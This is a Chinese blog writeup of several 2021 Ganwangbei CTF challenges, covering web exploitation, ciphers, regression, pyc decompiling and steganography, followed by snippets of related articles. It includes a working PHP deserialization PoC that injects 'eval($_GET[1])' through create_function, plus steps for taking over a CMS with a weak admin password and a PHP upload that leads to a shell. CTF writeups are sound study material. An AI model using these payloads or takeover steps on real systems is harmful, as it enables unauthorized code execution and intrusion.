2021年赣网杯部分writeup

最新推荐文章于 2022-10-09 11:52:18 发布
原创 最新推荐文章于 2022-10-09 11:52:18 发布 · 497 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#webview #android #java

本文介绍了网络安全中的代码漏洞挖掘技术,包括PHP反序列化、JavaScript游戏逻辑漏洞利用、图片隐藏信息提取以及加密解码过程。通过线性回归方程解析坐标获取flag,并涉及Python pyc文件逆向工程和图片中二维码的解码。此外,还涵盖了弱口令攻击、文件上传漏洞和CMS系统的安全性。

checkin

连连看

查看源码,存在多个js文件

在game.js中获取flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08}

easypop

unserialize($this->key)(); 关键点在这

当[new BBB,”test”]()

 会调用BBB的test方法

然后$a('', $this->code);

经典create_function 的格式

 poc

<?php
class func
{
       public $mod1;
       public $mod2;
       public $key;
}
 
class GetFlag
{       public $code;
        public $action;
       public function get_flag(){
           $a=$this->action;
           $a('', $this->code);
       }
}
$o = new func();
$o1 = new GetFlag();
$o1->code ="1;}eval(\$_GET[1]);/*";
$o1->action = 'create_function';
$o->key = serialize(array($o1,"get_flag"));
echo(urlencode(serialize($o)));

 挖洞大师

国际cms v1.1

通过index.php/admin,自动跳转到后台

 

真正后台地址

弱口令一把梭,admin  88888888

添加上传的文件后缀.php

主题模板处getshell

 拿到flag

Decodemaster

 打开decodemaster文档

全选修改为等线,取出字符串

取出字符串使用维吉尼亚密钥爆破,密钥为welcomegwb

 

解码标记的字符串

进行base92编码

进行base58编码,拿到flag

i-love-math

 打开文本显示一段字符串

Base32 解码,得到x,y的坐标值

通过绘图可知,为线性回归方程,进行线性拟合

拟合结果如下

把F(X)的首个数字整数位和+号后面的整数位进行 ASCII转换后为flag的值,最后124.9取整为125,所以为|,存在0.9999的偏差

flag{L1n34r_R3g7e5S10n_A_G0Od_Th1ng|

整理最终结果flag{L1n34r_R3g7e5S10n_A_G0Od_Th1ng}

testcat

 最新版pyinstxtractor.py 提取出1.pyc

修改文件头字节,uncompyle6 反编译1.pyc

修改代码print出结果

=4ld+EiemdFQQJWVfBTahUCMrgXJ

反转后得到JXgrMCUhaTBfVWJQQFdmeiE+dl4=

Base64解码得到

%x+0%!i0_UbP@Wfz!>v^

为zip密码,解压出cat

查看cat文件为png

用stegSolve打开图片,blue paln0 得到二维码

扫码得出flag{Ju57_E4sy_2_93t_17}

Sword-heart
关注
2021“绿城络安全大赛部分Writeup
qq_42815161的博客
09-29 1545
文章目录 MISC 签到 [warmup]音频隐写 Reverse [warmup]easy_re Crypto RSA-1 [warmup]加密算法 RSA2-PLUS MISC 签到 题目描述:关注“信郑州” 虽然下架了但是还是想吐槽一下/doge [warmup]音频隐写 手速题,题目给了一个附件标题音频隐写,直接用Audacity打开,导入数据,转频谱图,拖到最后。 接着手打或者OCR都可以 flag{f8fbb2c761821d3af2385...
2021web和misc部分wp
qq_48511129的博客
12-08 2059
web checkin flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} gwb-web-easypop 利用这个create_function函数闭合前面括号进行代码执行echo 2;}system(“cat /flag”);// exp <?php error_reporting(0); $pwd=getcwd(); class func { public $mod1; public $mod2; public $key; } class
2021_pwn1.rar
12-11
2021 pwn1 bin ctf
2021络安全大赛_部分Writeup
热门推荐
Keepb1ue的博客
12-07 1万+
Web 1.checkin 这种游戏类题目,一般都是用js去做控制结果 直接查看页源码点到http://118.31.60.233:10000/js/game.js Ctrl+F直接搜flag flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} 2.gwb-web-easypop <?php error_reporting(0); highlight_file(__FILE__); $pwd=getcwd(); class func { pu
GWBCTF2021 writeup
Laffrey的专栏
12-07 4527
0x01.[Misc]decodemaster-Closed 从题目得到一个docx文件“decodemaster.docx”,打开,发现内容是乱码。 仔细一看,发现字体是Wingdings 2,果然是套路。 全选文本,将字体修改为宋体,得到正常的文字。 Sllv we GMT gje dsh vc sim gzwspio! EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzm...
第一届络安全大赛 2020GW-CTF Web_Writeup
末初 · mochu7
09-08 4249
赛题类型WebEasyPhpparseHashMisc签到CheckinfaceDestroyJavaHidepig Web EasyPhp <?php $sz_txt = $_GET["sz_txt"]; $sz_file = $_GET["sz_file"]; $password = $_GET["password"]; if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
2021第二届络安全大赛MISC-Writeup
末初 · mochu7
12-06 7819
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcat decodemaster decodemaster.docx的内容是wingding编码:https://lingojam.com/WingDing Sllv we GMT gje dsh vc sim gzwspio! EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzmvem jegbmnwz
writeup-先锋1
08-04
writeup-先锋1】的知识点总结: 在络安全竞赛“”中,参赛者需要解决一系列挑战,这些挑战涉及到多种安全技术,如代码泄露、漏洞利用、加壳破解、文件格式分析等。以下是各部分的具体知识点: ...
2021Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021Writeup--by Nu1L Team.pdf”,“第五届‘强’全国络安全挑战赛”以及标签“CTF 络安全 信息安全”。这些信息共同指向一个全国性的络安全竞赛和Nu1L团队提交的...
[2021东华]Web Writeup1
08-03
Java 反序列化漏洞及利用 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,发生在 Java 对象的序列化和反序列化过程中。该漏洞可以导致攻击者执行恶意代码,盗取敏感信息,或者控制服务器。 ...
2022第三届“络安全大赛(青龙组)部分题目附件
09-19
2022第三届“络安全大赛(青龙组)部分题目附件 2022第三届“络安全大赛(青龙组)部分题目附件 2022第三届“络安全大赛(青龙组)部分题目附件 2022第三届“络...
js-protobuf-encode-decode-master.zip
04-17
在线protobuf编码/解码工具。 进入根目录,通过以下命令启动。 bower install serve
2022江西省络安全大赛学生组Web&Misc Writeup
末初 · mochu7
10-09 7605
2022江西省络安全大赛学生族Web&Misc Writeup
2021测试Face题WP
冰封 战戟
12-06 633
Face 下载解压,得到flag.txt,打开一看,是一大串表情字符: 在上找到替换编码表: Lenny Command Brainfuck+3 Command Description ( ͡° ͜ʖ ͡°) + Increment the memory cell under the pointer (> ͜ʖ<) -
第一届络安全大赛 2020GW-CTF Misc_Writeup
末初 · mochu7
11-07 2623
目录签到CheckinfaceDestroyJavaHidepig 签到Checkin flag{welc0me_to_ganwangbei} face Lennyfuck interpreter https://github.com/Knorax/Lennyfuck_interpreter 跟着对照表替换即可 ++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->
isset php 二维数组_浅析PHP反序列化漏洞
weixin_39982580的博客
12-28 425
0x01 前言很久没有些文章了,今天复习了反序列化漏洞的知识,顺便写了一篇文章。0x02 PHP序列化和反序列化基础我们想要将数组值存储到数据库时,就可以对数组进行序列化操作,然后将序列化后的值存储到数据库中。其实PHP序列化数组就是将复杂的数组数据类型转换为字符串,方便数组存库操作。对PHP数组进行序列化和反序列化操作,主要就用到两个函数,serialize和unserialize。PHP序列化...
serialize()和unserialize()(让数据库中一个字段存储多项数据 )
一个小彩笔
01-05 674
serialize()函数和unserialize()函数 一个是进行序列化存储, 另一个则是进行序列化恢复 示例用法: $array = array(); $array['key'] = 'website'; $array['value']='www.chhua.com'; $a = serialize($array); echo $a; unset($
2021CTF Writeup解题报告总结
从描述“3月6日,世界标准时间20:00 — 3月8日,世界标准时间22:00”我们可以推测,这场比赛在2021的这个时间段内进行,持续时间大约为两天。 由于标签中包含“Python”,可以推断在本次CTF比赛中,Python语言...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值